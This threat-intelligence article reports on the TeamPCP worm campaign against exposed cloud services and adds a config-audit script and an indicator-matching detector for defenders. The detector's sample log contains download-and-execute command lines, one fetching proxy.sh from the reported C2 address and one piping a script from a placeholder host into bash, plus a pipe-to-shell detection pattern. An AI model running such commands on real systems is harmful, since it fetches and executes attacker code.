Security researchers have identified a large-scale campaign against cloud-native environments whose aim is to build out malicious infrastructure for further exploitation. The activity, observed around December 25, 2025, has been characterized as “worm-driven.” Attackers exploited exposed Docker APIs, Kubernetes clusters, Ray dashboards, and Redis servers, and also leveraged the recently disclosed critical React2Shell vulnerability (CVE-2025-55182, CVSS score: 10.0).
The campaign has been attributed to a threat group tracked as TeamPCP, also known as DeadCatx3, PCPcat, PersyPCP, and ShellForce. The group is believed to have been active since at least November 2025, although its earliest Telegram activity dates back to July 30, 2025; its channel currently has over 700 members. TeamPCP publishes stolen data from victims in countries including Canada, Serbia, South Korea, the United Arab Emirates, and the United States. Its activity was first documented by Beelzebub in December 2025 under the name Operation PCPcat.
According to Flare security researcher Assaf Morag, the goals of the operation include building a large-scale distributed proxy and scanning infrastructure, as well as targeting servers for data exfiltration, ransomware deployment, extortion, and cryptocurrency mining. The infrastructure TeamPCP has assembled functions as a cloud-native cybercrime platform that uses misconfigured services as its primary attack vectors against modern cloud environments.
The compromised infrastructure has been misused for a variety of purposes, including cryptocurrency mining, data hosting, and functioning as proxy and command-and-control (C2) relays. TeamPCP relies on conventional attack strategies that utilize widely known vulnerabilities and prevalent misconfigurations to automate their exploitation processes. This approach enables the group to create a “self-propagating criminal ecosystem,” as noted by Flare.
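Each of the four exposed-service classes named above has a characteristic weak setting that a scanner like the one described here looks for. The following Python script is an added example, not code from Flare, TeamPCP, or the page: it audits constructed configuration snippets for those settings, showing the weak value next to its corrected form. The checks encode each service's documented defaults (dockerd `hosts`/`tlsverify`, Redis `bind`/`protected-mode`/`requirepass`, Ray `--dashboard-host`, kubelet `--anonymous-auth`/`--authorization-mode`/`--read-only-port`); the sample values, file contents and function names are assumptions and say nothing about how the group's own scanner works.

```python
import json
import shlex

# Constructed configuration snippets (not taken from any real host): the weak
# setting next to its corrected form for each service class named in the report.
WEAK_DOCKER = json.dumps({"hosts": ["unix:///var/run/docker.sock", "tcp://0.0.0.0:2375"]})
FIXED_DOCKER = json.dumps({
    "hosts": ["unix:///var/run/docker.sock", "tcp://0.0.0.0:2376"],
    "tls": True, "tlsverify": True, "tlscacert": "/etc/docker/ca.pem",
    "tlscert": "/etc/docker/server-cert.pem", "tlskey": "/etc/docker/server-key.pem",
})
WEAK_REDIS = "bind 0.0.0.0\nprotected-mode no\nport 6379\n"
FIXED_REDIS = "bind 127.0.0.1 -::1\nprotected-mode yes\nport 6379\nrequirepass CHANGE-ME\n"
WEAK_RAY = "ray start --head --dashboard-host 0.0.0.0"
FIXED_RAY = "ray start --head --dashboard-host 127.0.0.1"
WEAK_KUBELET = "kubelet --anonymous-auth=true --authorization-mode=AlwaysAllow --read-only-port=10255"
FIXED_KUBELET = "kubelet --anonymous-auth=false --authorization-mode=Webhook --read-only-port=0"


def _flags(cmdline: str) -> dict[str, str]:
    """Collect '--key=value' and '--key value' pairs from a command line."""
    args = shlex.split(cmdline)
    flags, i = {}, 0
    while i < len(args):
        arg = args[i]
        if arg.startswith("--"):
            if "=" in arg:
                key, value = arg[2:].split("=", 1)
            elif i + 1 < len(args) and not args[i + 1].startswith("--"):
                key, value = arg[2:], args[i + 1]
                i += 1
            else:
                key, value = arg[2:], "true"
            flags[key] = value
        i += 1
    return flags


def audit_docker_daemon(daemon_json: str) -> list[str]:
    """A dockerd TCP listener without tlsverify is an unauthenticated, root-equivalent API."""
    cfg = json.loads(daemon_json)
    tcp = [h for h in cfg.get("hosts", []) if h.startswith("tcp://")]
    if tcp and not (cfg.get("tls") and cfg.get("tlsverify")):
        return [f"docker: remote API on {', '.join(tcp)} without tlsverify"]
    return []


def audit_redis(redis_conf: str) -> list[str]:
    """Redis reachable from the network with no password and protected mode off."""
    settings = {}
    for line in redis_conf.splitlines():
        line = line.strip()
        if line and not line.startswith("#"):
            key, _, value = line.partition(" ")
            settings[key.lower()] = value.strip()
    findings = []
    if not settings.get("requirepass"):
        findings.append("redis: no requirepass set")
    if settings.get("protected-mode", "yes").lower() == "no":
        findings.append("redis: protected-mode disabled")
    if any(a in ("0.0.0.0", "*", "::") for a in settings.get("bind", "127.0.0.1").split()):
        findings.append("redis: bound to all interfaces")
    return findings


def audit_ray(cmdline: str) -> list[str]:
    """The Ray dashboard has no built-in authentication; binding it to 0.0.0.0 exposes job submission."""
    host = _flags(cmdline).get("dashboard-host", "127.0.0.1")
    return [f"ray: dashboard bound to {host}"] if host in ("0.0.0.0", "::", "*") else []


def audit_kubelet(cmdline: str) -> list[str]:
    """Anonymous kubelet access, AlwaysAllow authorization, or the unauthenticated read-only port."""
    flags = _flags(cmdline)
    findings = []
    if flags.get("anonymous-auth") == "true":
        findings.append("kubelet: anonymous-auth enabled")
    if flags.get("authorization-mode") == "AlwaysAllow":
        findings.append("kubelet: authorization-mode AlwaysAllow")
    if flags.get("read-only-port", "0") != "0":
        findings.append(f"kubelet: read-only port {flags['read-only-port']} open")
    return findings


def audit_all(docker_json: str, redis_conf: str, ray_cmd: str, kubelet_cmd: str) -> list[str]:
    """Run every check and return the combined list of findings."""
    return (audit_docker_daemon(docker_json) + audit_redis(redis_conf)
            + audit_ray(ray_cmd) + audit_kubelet(kubelet_cmd))


if __name__ == "__main__":
    for finding in audit_all(WEAK_DOCKER, WEAK_REDIS, WEAK_RAY, WEAK_KUBELET):
        print(finding)
    print("fixed:", audit_all(FIXED_DOCKER, FIXED_REDIS, FIXED_RAY, FIXED_KUBELET))
```

The Docker check is the one that matters most for this campaign: a `tcp://` listener without `tlsverify` lets anyone who can reach port 2375 start a privileged container, which is all a worm needs. Ray is listed separately because the dashboard is unauthenticated by design, so the only safe binding is a loopback or private address behind a proxy that adds authentication.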
Successful exploitation of systems allows attackers to deploy subsequent payloads from external servers. These payloads include shell- and Python-based scripts designed to identify new targets for further expansion. A significant component of their toolkit is “proxy.sh,” which facilitates proxying, peer-to-peer (P2P) networking, and tunneling utilities, while continuously scanning for additional vulnerabilities across the internet.
Importantly, “proxy.sh” conducts environment fingerprinting during its execution to determine if it is operating within a Kubernetes cluster. If such an environment is identified, it follows a tailored execution path to drop a cluster-specific secondary payload, highlighting TeamPCP’s reliance on specialized tools and tactics designed for cloud-native targets.
Other payloads include “scanner.py,” which looks for misconfigured Docker APIs and Ray dashboards, retrieves CIDR lists from a GitHub account named “DeadCatx3,” and includes options for running cryptocurrency miners. Scripts such as “kube.py” and “react.py” provide Kubernetes-specific functionality and exploit React2Shell (CVE-2025-55182) to gain broader control over compromised systems.
The command-and-control server at 67.217.57[.]240 has also been observed running Sliver, an open-source C2 framework widely misused by cybercriminals for post-exploitation. Victims primarily run Amazon Web Services (AWS) and Microsoft Azure infrastructure. The attacks appear opportunistic, exploiting exposed and misconfigured infrastructure rather than targeting specific sectors, so many organizations become collateral victims.
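The indicators the report gives (the C2 address, the four script names and the GitHub account) can be turned directly into a detection. The following Python script is an added example, not code from Flare or from the page: it scans constructed JSON-lines process and network events for those indicators plus one generic download-and-execute heuristic. The event format, field names, host names and sample lines are assumptions; the pipe-to-shell heuristic is a common defensive pattern rather than something the report attributes to TeamPCP, and 203.0.113.9 is a TEST-NET-3 documentation address, not an indicator from the report.

```python
import json
import re

# Indicators taken from the report above (C2 address kept defanged as published).
C2_IPS = ["67.217.57[.]240"]
SCRIPT_NAMES = ["proxy.sh", "scanner.py", "kube.py", "react.py"]
GITHUB_ACCOUNTS = ["DeadCatx3"]


def refang(ioc: str) -> str:
    """Turn the published '[.]' notation back into a matchable address."""
    return ioc.replace("[.]", ".")


# Digit look-arounds so 67.217.57.240 does not match inside a longer address.
C2_RES = [(refang(ip), re.compile(r"(?<!\d)" + re.escape(refang(ip)) + r"(?!\d)")) for ip in C2_IPS]
# Script names must stand alone, so 'proxy.sh' matches '/tmp/proxy.sh' but not 'myproxy.sh'.
SCRIPT_RE = re.compile(r"(?<![\w.-])(" + "|".join(map(re.escape, SCRIPT_NAMES)) + r")(?![\w.-])")
# Generic heuristic (assumption, not from the report): a fetch piped straight into a shell.
PIPE_TO_SHELL = re.compile(r"\b(?:curl|wget)\b[^|]*\|\s*(?:ba)?sh\b")


def match_event(event: dict) -> list[str]:
    """Return the reasons an event is suspicious; empty when it is not."""
    text = " ".join(str(v) for v in event.values())
    reasons = []
    for ip, rx in C2_RES:
        if rx.search(text):
            reasons.append(f"c2-ip:{ip}")
    for name in dict.fromkeys(SCRIPT_RE.findall(text)):   # dedupe, keep order
        reasons.append(f"script:{name}")
    for account in GITHUB_ACCOUNTS:
        if account in text:
            reasons.append(f"github:{account}")
    if event.get("type") == "exec" and PIPE_TO_SHELL.search(event.get("cmdline", "")):
        reasons.append("heuristic:pipe-to-shell")
    return reasons


def scan(lines) -> list[dict]:
    """Parse JSON-lines events and return only those that matched, with their reasons."""
    hits = []
    for line in lines:
        line = line.strip()
        if not line:
            continue
        event = json.loads(line)
        reasons = match_event(event)
        if reasons:
            hits.append({"ts": event.get("ts"), "host": event.get("host"),
                         "type": event.get("type"), "reasons": reasons})
    return hits


# Constructed sample telemetry (assumption): exec, connect and http events from one node.
SAMPLE_LOG = """\
{"ts": "2025-12-26T03:14:07Z", "type": "exec", "host": "worker-3", "cmdline": "curl -s http://67.217.57.240/proxy.sh -o /tmp/proxy.sh"}
{"ts": "2025-12-26T03:14:08Z", "type": "exec", "host": "worker-3", "cmdline": "sh /tmp/proxy.sh"}
{"ts": "2025-12-26T03:14:09Z", "type": "connect", "host": "worker-3", "dst_ip": "67.217.57.240", "dst_port": 443}
{"ts": "2025-12-26T03:15:00Z", "type": "exec", "host": "worker-3", "cmdline": "python3 /tmp/scanner.py"}
{"ts": "2025-12-26T03:15:01Z", "type": "http", "host": "worker-3", "url": "https://github.com/DeadCatx3"}
{"ts": "2025-12-26T03:16:00Z", "type": "exec", "host": "worker-3", "cmdline": "kubectl get pods -A"}
{"ts": "2025-12-26T03:16:01Z", "type": "connect", "host": "worker-3", "dst_ip": "10.0.0.5", "dst_port": 443}
{"ts": "2025-12-26T03:17:00Z", "type": "exec", "host": "worker-3", "cmdline": "curl -fsSL http://203.0.113.9/x.sh | bash"}
"""


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG.splitlines()):
        print(hit["ts"], hit["host"], hit["type"], ", ".join(hit["reasons"]))
```

The IP and file-name matches are brittle by nature (the operators can rotate both), which is why the last sample line is caught only by the behavioural rule. In production the heuristic rule should stay even after the published indicators go stale.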
Morag stated that the PCPcat campaign illustrates a complete lifecycle of scanning, exploitation, persistence, tunneling, data theft, and monetization, specifically tailored for modern cloud infrastructures. TeamPCP stands out not due to technical novelty, but through the operational integration and scale of their attacks. A deeper analysis suggests that the majority of their exploits rely on well-known vulnerabilities and slightly modified open-source tools.
This dual approach, combining infrastructure exploitation with data theft and extortion, makes the group harder to categorize. TeamPCP leverages leaked databases and identity records to facilitate ransomware and fraud and to build a reputation in the cybercrime scene, diversifying its revenue streams and making it more resilient to takedowns.